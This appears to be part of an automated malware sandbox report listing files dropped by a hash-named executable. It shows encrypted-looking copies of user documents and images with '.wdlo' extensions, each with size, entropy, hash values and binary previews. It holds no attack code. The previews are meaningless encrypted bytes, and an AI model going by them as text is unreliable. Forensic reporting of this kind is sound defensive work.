                  Preview:WSHEJ{....L%..)...;.[...c.._.2.$......2...a.'@~...(.."....T..>{.....+...)...K.....*.z...\.W..8..3..1{.."%4.5.$.'...?.zW]'&.5.n..;..W..]..v.l.I...x^..9.CsyT,h@..9.p.w..K......&.(..,....Z.....W\N...9.J.f.Gr.#..#<..Q5=g..:0....v....rV..~.Y.Cs........$qG>Hs..../...b..T=VVr..."i.....v.Om......"W.Ei.u.t..d'i..{...s..|Xw....%...b...k..?JJcU....' ..m.V...M-k;.#...(.O....V.nm..@.4....E3'..^Ms......\. .....p%s..JIK.E.Bm.K..8.U.d;..^.+$..;.......\._.1......u..`..ao4.(..9..*9.R...<.h.r...wpO.FR..zA-..6.OV.\....:....S....._%.-e....P..*..9s.....0.6..I....P...((.b..'r...$...g.....e..O........uo..-}5..f2.Q..g....8b........?.....#ux...D...">..l...V.h..w.6A...|M3.....GX.B.U.....`u.}..-8_.^_.q+\:z.H.X.....^."....S1..t.... .).(.H....C..1.&..Sd{.xI..|.u#e.......i_........(D...(`....Uy....p..*.8m...A-4.s...U...1.@.t.#./..Q.[#..K.F]R67D....5.B.XM...1..>+..U...+..O...Y0O}w.7niS.;..@Z.@.gi...A^.3.x...i.G..o.'/V.@4...;.Kk.."N.%.c...t.....fe....]..Q>.#...^.Wc

                  C:\Users\user\Documents\LIJDSFKJZG\WSHEJMDVQC.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.841078141380988
                  Encrypted:false
                  SSDEEP:24:pdTvBOTA65n/0eX/UJuFK7JlbVLBeDCnil5DQAhZ5VAXFPRXokth3zbD:pdVOTA65d+uFKdLBDy5QKA/7h3nD
                  MD5:615DAF267F4F84389F17FC6F14D39451
                  SHA1:545218EDA47DF8C85BC236FDAC1EF997C7EB6A2B
                  SHA-256:F70A90BD23E35C051FB76A449F6BB6D47D72A387BEDD5C0AB9075FDC7431E284
                  SHA-512:CB1764B33919D465EE165F2A7B32209EE8DB85DAAA87345AAA65FF1432AE638E313DBCA1DED55F8D142F173FABF234339BB805B5BEFF18852759AE0737159668
                  Malicious:false
                  Preview:WSHEJ{....L%..)...;.[...c.._.2.$......2...a.'@~...(.."....T..>{.....+...)...K.....*.z...\.W..8..3..1{.."%4.5.$.'...?.zW]'&.5.n..;..W..]..v.l.I...x^..9.CsyT,h@..9.p.w..K......&.(..,....Z.....W\N...9.J.f.Gr.#..#<..Q5=g..:0....v....rV..~.Y.Cs........$qG>Hs..../...b..T=VVr..."i.....v.Om......"W.Ei.u.t..d'i..{...s..|Xw....%...b...k..?JJcU....' ..m.V...M-k;.#...(.O....V.nm..@.4....E3'..^Ms......\. .....p%s..JIK.E.Bm.K..8.U.d;..^.+$..;.......\._.1......u..`..ao4.(..9..*9.R...<.h.r...wpO.FR..zA-..6.OV.\....:....S....._%.-e....P..*..9s.....0.6..I....P...((.b..'r...$...g.....e..O........uo..-}5..f2.Q..g....8b........?.....#ux...D...">..l...V.h..w.6A...|M3.....GX.B.U.....`u.}..-8_.^_.q+\:z.H.X.....^."....S1..t.... .).(.H....C..1.&..Sd{.xI..|.u#e.......i_........(D...(`....Uy....p..*.8m...A-4.s...U...1.@.t.#./..Q.[#..K.F]R67D....5.B.XM...1..>+..U...+..O...Y0O}w.7niS.;..@Z.@.gi...A^.3.x...i.G..o.'/V.@4...;.Kk.."N.%.c...t.....fe....]..Q>.#...^.Wc

                  C:\Users\user\Documents\NIRMEKAMZH.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.853632912255633
                  Encrypted:false
                  SSDEEP:24:xPoIuejsox+Ne3Zh5kx4hxBdPgW1VskpPeEZuIX9EK9OHFadK0Ksam7bI2Mn3zbD:RduejV+NeZfvx1Vsijn9EyOladK0RamQ
                  MD5:0621992427AA70A099A52AD9518782CD
                  SHA1:3F78AFC8F4BA5059A79CF145688BD2E8269C2928
                  SHA-256:D908647630F82DF8955503ACF77F5D640F6F33E0C540479D84435F1949DB942B
                  SHA-512:780402A11A8DAF48C6872D884A12398A4DD148F367CFA2EDA1421CCD2E00FB34A13436FA73928F1D0F39F95B55F785A7DB345272C1B0A70547FEFE8399329D73
                  Malicious:false
                  Preview:NIRMEO..*x).`.`$......%:9...r'....4.[.P..>..~.^g..x........wlE.T.X...1Y....7..u..1y&...j.8.r.YK R..kHq....&*.;...~."v..b.tK{Y..u.#....uY.9...B.3P.........Q...e.\.O.$d..4.Z........fyE.0o).4......}.....X..U...Z.e.6..{....y.V(....3~..[.u.......#....~.Dkj=..7pu'....@so....8...S/.q.;."T^.....DG..M.........=4.T IL...B..v2TDX..X$.R.^R4.Cj.R.......Lp..t..N....%..6..;}..u.N".s.y..,<..r..$_..^.<.5T}...iV..Z......K.F.bn.Z/.....&..D..F.T..e.....m.....C..A\.K..`...w.Dv3...).G^.P..=._.u.b..u3....`0.../.....}....@.x. ..._Q7..2[.........9...=..^C;S...n....\R....4>..@)rebP.Y...N.G@.mK<.$.....J.^........,.....6...H,9.v.0.@.8...X..#..D..}..*..>mK.......O............@?#L=n..h..........)e...0..a..B...W....*.R.XAI/d..~..^@........EO....\E=.9..r.].i...z4.>.N..C.#........w..U..{..H...A.{9.T.D.!.\3B....P;.*.....8(..h..(Wa..<Q.9.&dY..b@P......!..V..Q......>#V)1.P^....Y.h7..f.J....-.....D.@..d.D.~dC.F...Gd...pq.G-...{.k..4..:1."u.q..._3'.G.l..........vd;\$0Q..

                  C:\Users\user\Documents\NIRMEKAMZH.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.853632912255633
                  Encrypted:false
                  SSDEEP:24:xPoIuejsox+Ne3Zh5kx4hxBdPgW1VskpPeEZuIX9EK9OHFadK0Ksam7bI2Mn3zbD:RduejV+NeZfvx1Vsijn9EyOladK0RamQ
                  MD5:0621992427AA70A099A52AD9518782CD
                  SHA1:3F78AFC8F4BA5059A79CF145688BD2E8269C2928
                  SHA-256:D908647630F82DF8955503ACF77F5D640F6F33E0C540479D84435F1949DB942B
                  SHA-512:780402A11A8DAF48C6872D884A12398A4DD148F367CFA2EDA1421CCD2E00FB34A13436FA73928F1D0F39F95B55F785A7DB345272C1B0A70547FEFE8399329D73
                  Malicious:false
                  Preview:NIRMEO..*x).`.`$......%:9...r'....4.[.P..>..~.^g..x........wlE.T.X...1Y....7..u..1y&...j.8.r.YK R..kHq....&*.;...~."v..b.tK{Y..u.#....uY.9...B.3P.........Q...e.\.O.$d..4.Z........fyE.0o).4......}.....X..U...Z.e.6..{....y.V(....3~..[.u.......#....~.Dkj=..7pu'....@so....8...S/.q.;."T^.....DG..M.........=4.T IL...B..v2TDX..X$.R.^R4.Cj.R.......Lp..t..N....%..6..;}..u.N".s.y..,<..r..$_..^.<.5T}...iV..Z......K.F.bn.Z/.....&..D..F.T..e.....m.....C..A\.K..`...w.Dv3...).G^.P..=._.u.b..u3....`0.../.....}....@.x. ..._Q7..2[.........9...=..^C;S...n....\R....4>..@)rebP.Y...N.G@.mK<.$.....J.^........,.....6...H,9.v.0.@.8...X..#..D..}..*..>mK.......O............@?#L=n..h..........)e...0..a..B...W....*.R.XAI/d..~..^@........EO....\E=.9..r.].i...z4.>.N..C.#........w..U..{..H...A.{9.T.D.!.\3B....P;.*.....8(..h..(Wa..<Q.9.&dY..b@P......!..V..Q......>#V)1.P^....Y.h7..f.J....-.....D.@..d.D.~dC.F...Gd...pq.G-...{.k..4..:1."u.q..._3'.G.l..........vd;\$0Q..

                  C:\Users\user\Documents\PWZOQIFCAN.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8632241379751
                  Encrypted:false
                  SSDEEP:24:5UbxzeJmXOxpaE8kDXhTL45M3jUrjDW02wRIAz7eegCHlJacm4sgEY3zbD:+Nz8msBc5MI3mkHlkcm4svY3nD
                  MD5:866485F9BAB86AE8278B7813D44330F1
                  SHA1:0B122D1C8450860A472067B4CC9C433C6C114193
                  SHA-256:D10EF4657B55FC537E1D24371FF8AFA24EEAEDAF8F120B05E27E301118573249
                  SHA-512:20160B4E871FF4DFD1FCA145DCEE249EAD0AB52B4279DAB3AC0A9DDE703E7364E6003027F13491C47FBC6F9DC4BA1211B6572EFABFC9FF58488EDE9FF1BC5DF3
                  Malicious:false
                  Preview:PWZOQ..u.....5k..G....=./.G.S.7....BS_......KQ5.}.:.OOZ......3...^m.....)k9.:..m..;e...8.).~....3....../.q.....:.".|$^..,..a.V.#l...._..../....f.m.l....S...."B...hP...1/...,.:.9.....@.......w.F..`..D.......2.l....as.dS..3~.1/.......V%.k....~...>.g.P..Z..n.....Il....[A5..`.p..D.F...#.c.fr..#.`.L|qD5.*`5..W...S...j..o..k<........(O..n..C`....$'.f.....D.........}3.Z.."HsJ..s(._W.@H.5.,...K.t.T.]<.^TiJ...W..2m.........51.....i.l..! ...\...x..3If.B..8...(IV.e...u...r..b.+.W..(.7.vy.o.M$..1.QY'...V.T.5.O.F..s$N..l..>..1.{[].L....w.V.0s......H.5....1..e..j_v.G.i...........$.1..4..y....6.Q......j&..>...5e}K.q..u7...>..i.NE.OA......\.=.v..Q&o.#....n..e=O.Wx.e...m#.a..H.......c%<A-....6.Z..'.......PXu{k#J.....}..qN...?.._g.L,....LvG.Cw8....R?....n...].y....V+-@...+.?...9......s.N..L.......e.....@].5.T....-F.("sc...(.X.B....2..{.+..G.P...I...!.sI).p.././RK..T..Y......i.x.X!2...B7:....IT..](P./p..bZfp......ca.....w^l..$.;.~..7U;`9.]q...{,R.i.A...q.I

                  C:\Users\user\Documents\PWZOQIFCAN.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8632241379751
                  Encrypted:false
                  SSDEEP:24:5UbxzeJmXOxpaE8kDXhTL45M3jUrjDW02wRIAz7eegCHlJacm4sgEY3zbD:+Nz8msBc5MI3mkHlkcm4svY3nD
                  MD5:866485F9BAB86AE8278B7813D44330F1
                  SHA1:0B122D1C8450860A472067B4CC9C433C6C114193
                  SHA-256:D10EF4657B55FC537E1D24371FF8AFA24EEAEDAF8F120B05E27E301118573249
                  SHA-512:20160B4E871FF4DFD1FCA145DCEE249EAD0AB52B4279DAB3AC0A9DDE703E7364E6003027F13491C47FBC6F9DC4BA1211B6572EFABFC9FF58488EDE9FF1BC5DF3
                  Malicious:false
                  Preview:PWZOQ..u.....5k..G....=./.G.S.7....BS_......KQ5.}.:.OOZ......3...^m.....)k9.:..m..;e...8.).~....3....../.q.....:.".|$^..,..a.V.#l...._..../....f.m.l....S...."B...hP...1/...,.:.9.....@.......w.F..`..D.......2.l....as.dS..3~.1/.......V%.k....~...>.g.P..Z..n.....Il....[A5..`.p..D.F...#.c.fr..#.`.L|qD5.*`5..W...S...j..o..k<........(O..n..C`....$'.f.....D.........}3.Z.."HsJ..s(._W.@H.5.,...K.t.T.]<.^TiJ...W..2m.........51.....i.l..! ...\...x..3If.B..8...(IV.e...u...r..b.+.W..(.7.vy.o.M$..1.QY'...V.T.5.O.F..s$N..l..>..1.{[].L....w.V.0s......H.5....1..e..j_v.G.i...........$.1..4..y....6.Q......j&..>...5e}K.q..u7...>..i.NE.OA......\.=.v..Q&o.#....n..e=O.Wx.e...m#.a..H.......c%<A-....6.Z..'.......PXu{k#J.....}..qN...?.._g.L,....LvG.Cw8....R?....n...].y....V+-@...+.?...9......s.N..L.......e.....@].5.T....-F.("sc...(.X.B....2..{.+..G.P...I...!.sI).p.././RK..T..Y......i.x.X!2...B7:....IT..](P./p..bZfp......ca.....w^l..$.;.~..7U;`9.]q...{,R.i.A...q.I

                  C:\Users\user\Documents\QFAPOWPAFG.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846663608258243
                  Encrypted:false
                  SSDEEP:24:6T3FgpaWOv8So/EiugIJoqKvlX5cWIga9THh4qtJh37zuiK73iWu53zbD:6RgpaWv3ZugXvlJ7a9DZxmSWM3nD
                  MD5:8DC819EEC41BE6EB49515F6E86ED26B3
                  SHA1:16F96F6285A21097ACAE12B1A8CFCBBB6250FAD4
                  SHA-256:5A49B6B34D6ACA390CB81DB187A34797767781608D10849ABB80D2D9F1AB9269
                  SHA-512:7B084EAAC9A40D5FD9471338FA558A8D9E18BFA40D87B50E99E0ED16025BEDC87D2D33F3835CABF996E5BE1C7B0B557230F75779C66452B4C9FC6BBFE79DB80F
                  Malicious:false
                  Preview:QFAPOz..!..7..O..zE.5*.F!.i....C...Ck..<.i...f...(.....8.w.....Ra..<..,.`....%z.*......m....k.N...wT.w..tCF..S..kQ...e..k..y.Y../.2D._....}..c5..~.gV.Sy:......x.....).^5...^.f{.....v..Lf..~..*.uW*P. .W.a0r........L)...)G..#c....9!../r6.r...^.S.d..G"dQ..I...-.,d}gj.&.....P.{..n....K..l..............(Gw..sw.pP.....*....?....M._.....G..!.VkI./...kK...P.CB[..G......}..(...A{..Ps...&..tv..B.!.m...n-G....i..Qa.5..Xn..l.a..*X...0.si..-b.).ug.K.9...5.eG...a....x.|[3p.9BD.'p(.(.h.Ut..JJw..BH`..?-T.I...s.D"F..H.).%.,..u.P5...u'.%xu.[x.}.$B.~.....,.......-...q...6...>C..i...|....i\./w.R........)Gl.t.A..J...al....BF;...9.LO.cp....f.gU.......z.>8...f.........@..7.....=..}.7.M.+.....WY.1.-....<.(c`...@l..X..q7...>H..'.zG.SF.....{.);.^5$.6..\.....E..z.f...:..a3q.q.j6.t.-'..j.;2&.j{.....|.:jRRTT..F....)*.6.[W.*.v.3.=.'7.Q4....;G..j..iAs.,6.0gw.2&..j..=Ef..X..\s..t...{...7...X.5..o..A....W.........!i....ym...:..-...Z.T...K.R..Z..............~....

                  C:\Users\user\Documents\QFAPOWPAFG.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846663608258243
                  Encrypted:false
                  SSDEEP:24:6T3FgpaWOv8So/EiugIJoqKvlX5cWIga9THh4qtJh37zuiK73iWu53zbD:6RgpaWv3ZugXvlJ7a9DZxmSWM3nD
                  MD5:8DC819EEC41BE6EB49515F6E86ED26B3
                  SHA1:16F96F6285A21097ACAE12B1A8CFCBBB6250FAD4
                  SHA-256:5A49B6B34D6ACA390CB81DB187A34797767781608D10849ABB80D2D9F1AB9269
                  SHA-512:7B084EAAC9A40D5FD9471338FA558A8D9E18BFA40D87B50E99E0ED16025BEDC87D2D33F3835CABF996E5BE1C7B0B557230F75779C66452B4C9FC6BBFE79DB80F
                  Malicious:false
                  Preview:QFAPOz..!..7..O..zE.5*.F!.i....C...Ck..<.i...f...(.....8.w.....Ra..<..,.`....%z.*......m....k.N...wT.w..tCF..S..kQ...e..k..y.Y../.2D._....}..c5..~.gV.Sy:......x.....).^5...^.f{.....v..Lf..~..*.uW*P. .W.a0r........L)...)G..#c....9!../r6.r...^.S.d..G"dQ..I...-.,d}gj.&.....P.{..n....K..l..............(Gw..sw.pP.....*....?....M._.....G..!.VkI./...kK...P.CB[..G......}..(...A{..Ps...&..tv..B.!.m...n-G....i..Qa.5..Xn..l.a..*X...0.si..-b.).ug.K.9...5.eG...a....x.|[3p.9BD.'p(.(.h.Ut..JJw..BH`..?-T.I...s.D"F..H.).%.,..u.P5...u'.%xu.[x.}.$B.~.....,.......-...q...6...>C..i...|....i\./w.R........)Gl.t.A..J...al....BF;...9.LO.cp....f.gU.......z.>8...f.........@..7.....=..}.7.M.+.....WY.1.-....<.(c`...@l..X..q7...>H..'.zG.SF.....{.);.^5$.6..\.....E..z.f...:..a3q.q.j6.t.-'..j.;2&.j{.....|.:jRRTT..F....)*.6.[W.*.v.3.=.'7.Q4....;G..j..iAs.,6.0gw.2&..j..=Ef..X..\s..t...{...7...X.5..o..A....W.........!i....ym...:..-...Z.T...K.R..Z..............~....

                  C:\Users\user\Documents\SNIPGPPREP.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8526665896069465
                  Encrypted:false
                  SSDEEP:24:ChiTU5tEXWSij+/Hav62mRwj3ZTRFqkm0IG1Ys8Qxb4PUBwQ39btfIwihFHAZB8T:Qi+uX6q/6ku3kI1rM2Dtt4qgA83nD
                  MD5:B68071D6BD8510C01590C14FE1E43263
                  SHA1:7904BC13352606E600485B95F36282C05E1F13E5
                  SHA-256:7AD94CBF0FEA026C510898446E755336334193F05BD0156EDF5835FFB7404552
                  SHA-512:226CEA70B1627DA6925B390379F3AD4E9A03BE79E77FF5F87377FE6DFCEE7D9BA020DFA2840A4EE98781EAEEFF2917318B73CDEAE99F6C966B8AE1309558E880
                  Malicious:false
                  Preview:SNIPG.KZ6.k~.%.I.F>.~...WOw.{R.....N....I....a.Y........c..p...].`...y'.7@Z<.Ib.........Ux.Nbc....,1.s...,.4...%.../&..s#.+..YI.2gj...->.Z.;..Y..sc.(..\..5.f2a.#<k.......c.!.%p.n>XJ........V.......54.z.z.*.b?d...}.zQ..(.K\..%\.o\.ur!<...P.*...@l..Aj..:.....,uP.e.j...J.....W.."l...iwq...l....9..E...j..L{.......BJ....#....4.>..a....+tXo....o..tO....W.....Ad.... ...#.nL....^.Yv,..a.){.s))./N`.l.CK\JA..w.{..C...O.u..,L......=.m.K...-.r-.H.!\._......r.5...d......@.H....a.'..iG.*.S8l.._.Z4.f:.4L3jjHA..mQ...j.......M..d>...@.F.L.v... .z@#>2......O.;0........R..1....E.p,.....4.Hl)#P...eq.l..M..I.RZg..`o.elS.......sj.A..."$-.|Q.....=;1.....A..2h.2.P..o)..o..W.c..0..#..t........o...B..].!.}$U..;<...!Zei....[0M.R..6..[.....M.......I..G.h..H.bsZ....]L....7.d...?t.R\...W@P...]}.%.?.!,I.:....X......<'m....F>P`.\...1...\..>(...w@..,......o..m.wv`X.....,..q.G2.8.....H.QcO._..IS.F....]...E<.....(}.I?..F.T..^.+..x.'.I.....%k..z.-_29k...iU..r....L.....

                  C:\Users\user\Documents\SNIPGPPREP.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8526665896069465
                  Encrypted:false
                  SSDEEP:24:ChiTU5tEXWSij+/Hav62mRwj3ZTRFqkm0IG1Ys8Qxb4PUBwQ39btfIwihFHAZB8T:Qi+uX6q/6ku3kI1rM2Dtt4qgA83nD
                  MD5:B68071D6BD8510C01590C14FE1E43263
                  SHA1:7904BC13352606E600485B95F36282C05E1F13E5
                  SHA-256:7AD94CBF0FEA026C510898446E755336334193F05BD0156EDF5835FFB7404552
                  SHA-512:226CEA70B1627DA6925B390379F3AD4E9A03BE79E77FF5F87377FE6DFCEE7D9BA020DFA2840A4EE98781EAEEFF2917318B73CDEAE99F6C966B8AE1309558E880
                  Malicious:false
                  Preview:SNIPG.KZ6.k~.%.I.F>.~...WOw.{R.....N....I....a.Y........c..p...].`...y'.7@Z<.Ib.........Ux.Nbc....,1.s...,.4...%.../&..s#.+..YI.2gj...->.Z.;..Y..sc.(..\..5.f2a.#<k.......c.!.%p.n>XJ........V.......54.z.z.*.b?d...}.zQ..(.K\..%\.o\.ur!<...P.*...@l..Aj..:.....,uP.e.j...J.....W.."l...iwq...l....9..E...j..L{.......BJ....#....4.>..a....+tXo....o..tO....W.....Ad.... ...#.nL....^.Yv,..a.){.s))./N`.l.CK\JA..w.{..C...O.u..,L......=.m.K...-.r-.H.!\._......r.5...d......@.H....a.'..iG.*.S8l.._.Z4.f:.4L3jjHA..mQ...j.......M..d>...@.F.L.v... .z@#>2......O.;0........R..1....E.p,.....4.Hl)#P...eq.l..M..I.RZg..`o.elS.......sj.A..."$-.|Q.....=;1.....A..2h.2.P..o)..o..W.c..0..#..t........o...B..].!.}$U..;<...!Zei....[0M.R..6..[.....M.......I..G.h..H.bsZ....]L....7.d...?t.R\...W@P...]}.%.?.!,I.:....X......<'m....F>P`.\...1...\..>(...w@..,......o..m.wv`X.....,..q.G2.8.....H.QcO._..IS.F....]...E<.....(}.I?..F.T..^.+..x.'.I.....%k..z.-_29k...iU..r....L.....

                  C:\Users\user\Documents\UNKRLCVOHV.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8642338717966265
                  Encrypted:false
                  SSDEEP:24:2vrstG+OusnEvhOjdBacs+y/fZxW5YPi0yviFhHYU5eZjVyYCWGvBW9MPOG63zbD:2zstGgsnEP+y3ZxWbUv95eZjVyYCVvP0
                  MD5:2F8ABFF8FCC30E7FEB87A2841BA9E390
                  SHA1:EF4550DA4B4951F55E4288E18676A233E06FA667
                  SHA-256:ACC30DE593F6BD5A66CF63D4EA9FE7B20EC232823F4CEEEE851566816C9E925C
                  SHA-512:F256B545A43A8E23D31133E54F393D2B33B3BE8045A98E5245124915E024604C36EA6B966551C40831353EA4B4B2E9BE1A9A792380872A882CB0F9F4CC70D9FB
                  Malicious:false
                  Preview:UNKRL..<UkG.v.....>.3.#. i..........$......o.2S..^.....S-.....Mxn..#.w....L..4.g.4.X..I.`....=..pe..h{.j....O..~...lp.W.&...Ha..9":.i=.....|.4.w.KB<..e. `.Q.....W7Z[....zj..r^.....YZ..7..i......A..D.........=...qv.0.......;...._.@...>]..q./&.B.........m.H......rs|#.F..(w&.wL.z.i0H.Hj.vT.[~.;?!.....O`z.........F.@..9..F..T..R.....(n.....g.).....x.X......X..'...."..k......8E.............6.K. ...+FN.oCF...O....z....?\..K....a....Y...g$..$....~..a+...E|e..].T.%..B...._.l.C..."J...W)DT.A8o.X.4..[.C;..vV.A|vtu.c..T.4...z.j.>..Za...\..Z.....>......W|K...Dc..U..AS.9...G[.5Z.5%......w...U9.&..42....@.....;T.e........p.....AA.($...S.k.vz>.`......4@trH..v..{..'V:b......c......M;.......r=.}N.S.&_..+..F?....|A,..{.Qs..v.......I..7....+W.5..{..r.]..(...1o.....H...I.l..2.0gU..X...r........O..|.=..0.a]$.!W.B...2c...E$.&R/.`......-UG.&+uD.(...(i.Q.m=............^..W.y.J....|.*.e.1Zg])...Z..O......XR?3.+......F".(..$JQY.{..............D.=d........J..m0...9

                  C:\Users\user\Documents\UNKRLCVOHV.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8642338717966265
                  Encrypted:false
                  SSDEEP:24:2vrstG+OusnEvhOjdBacs+y/fZxW5YPi0yviFhHYU5eZjVyYCWGvBW9MPOG63zbD:2zstGgsnEP+y3ZxWbUv95eZjVyYCVvP0
                  MD5:2F8ABFF8FCC30E7FEB87A2841BA9E390
                  SHA1:EF4550DA4B4951F55E4288E18676A233E06FA667
                  SHA-256:ACC30DE593F6BD5A66CF63D4EA9FE7B20EC232823F4CEEEE851566816C9E925C
                  SHA-512:F256B545A43A8E23D31133E54F393D2B33B3BE8045A98E5245124915E024604C36EA6B966551C40831353EA4B4B2E9BE1A9A792380872A882CB0F9F4CC70D9FB
                  Malicious:false
                  Preview:UNKRL..<UkG.v.....>.3.#. i..........$......o.2S..^.....S-.....Mxn..#.w....L..4.g.4.X..I.`....=..pe..h{.j....O..~...lp.W.&...Ha..9":.i=.....|.4.w.KB<..e. `.Q.....W7Z[....zj..r^.....YZ..7..i......A..D.........=...qv.0.......;...._.@...>]..q./&.B.........m.H......rs|#.F..(w&.wL.z.i0H.Hj.vT.[~.;?!.....O`z.........F.@..9..F..T..R.....(n.....g.).....x.X......X..'...."..k......8E.............6.K. ...+FN.oCF...O....z....?\..K....a....Y...g$..$....~..a+...E|e..].T.%..B...._.l.C..."J...W)DT.A8o.X.4..[.C;..vV.A|vtu.c..T.4...z.j.>..Za...\..Z.....>......W|K...Dc..U..AS.9...G[.5Z.5%......w...U9.&..42....@.....;T.e........p.....AA.($...S.k.vz>.`......4@trH..v..{..'V:b......c......M;.......r=.}N.S.&_..+..F?....|A,..{.Qs..v.......I..7....+W.5..{..r.]..(...1o.....H...I.l..2.0gU..X...r........O..|.=..0.a]$.!W.B...2c...E$.&R/.`......-UG.&+uD.(...(i.Q.m=............^..W.y.J....|.*.e.1Zg])...Z..O......XR?3.+......F".(..$JQY.{..............D.=d........J..m0...9

                  C:\Users\user\Documents\UNKRLCVOHV.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.834532511343188
                  Encrypted:false
                  SSDEEP:24:jb7jwZcL1SlnLSQWprx1TvHaVVcVgHp45peXCUdW9IWmhaHsEY3zbD:j7wZcLa+QWBfv4VcqHpepB59TmOs13nD
                  MD5:AF34719CDB096A6F38EF6B21D1A4270C
                  SHA1:46DC5DB981D4A523594737319DF5B8F67669B122
                  SHA-256:AAA4178E5CDF1D0B8A08665925B59432739260D8C0F76A16374A7BDCEAC01650
                  SHA-512:9EEF1972458BEA3DAB274BCCD365773F9C3638C19B893F2AE9B8F94773467DA6B5528DACD2598CDD0CBE7CCDC1E0CDBE6A20D8780C7C818DFE6B1E2B38474774
                  Malicious:false
                  Preview:UNKRLm<......=....fK.5*F..V,k`..<^D..>s....z.oc..R...O...<...d.....IZ../.s.y...Z/.../.~0..,.a......} ..i.."n.y'...o.=D.i...f5g...a.._...5B$...`...G.l.5(R..t....{...G.Z.8.._%D..3.G>.(.Jq...|43.PD...".6..e..'.l1.V.8/2.W5......N....!a....mL..@a..M..dR.9..<...y_dh7...<..{.0..#./.r...Z.......gWw....R.v...8..c...a.,._.i.42.......I/...I..^.<Z..p.j..5.r....|n...T..2...Ie~_..q.V.[JG.L..$.v`.Y#M.!.4.;>e.XQe.k.r....*...o."?..nz&XD.KjH*...d...!..;.M.(.....B...|.[.....:.k5..|.#..t.... ......@Ngm==.#.#....5..4.......&.mC6..}..}...v...4......^..|.z,:>2......y~.....Z......6+^.t.1..s.>..TM.;....n.......m....o.Ylb{.............O.4..p.0....E..h.\f........fX..z\aX..N.....4.B.#...b.J.....q.h,.$)._b....R4..&4.bc...|.8.2Y.{...I.......B..&..s....I.eo]s..1.kck....J.....F..,OVN.....Gb...~..L..l=.X....J.G6.[....R*..eM-.CNk.T..o...r....g.L....o..5.....F\......w..K.....,.6...s#.>O.....A...Hoh.E.iq8.6..2....Nv3....jcl.l.T... K......!.....q..MJ.:.N......6...T....q.o....eX..

                  C:\Users\user\Documents\UNKRLCVOHV.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.834532511343188
                  Encrypted:false
                  SSDEEP:24:jb7jwZcL1SlnLSQWprx1TvHaVVcVgHp45peXCUdW9IWmhaHsEY3zbD:j7wZcLa+QWBfv4VcqHpepB59TmOs13nD
                  MD5:AF34719CDB096A6F38EF6B21D1A4270C
                  SHA1:46DC5DB981D4A523594737319DF5B8F67669B122
                  SHA-256:AAA4178E5CDF1D0B8A08665925B59432739260D8C0F76A16374A7BDCEAC01650
                  SHA-512:9EEF1972458BEA3DAB274BCCD365773F9C3638C19B893F2AE9B8F94773467DA6B5528DACD2598CDD0CBE7CCDC1E0CDBE6A20D8780C7C818DFE6B1E2B38474774
                  Malicious:false
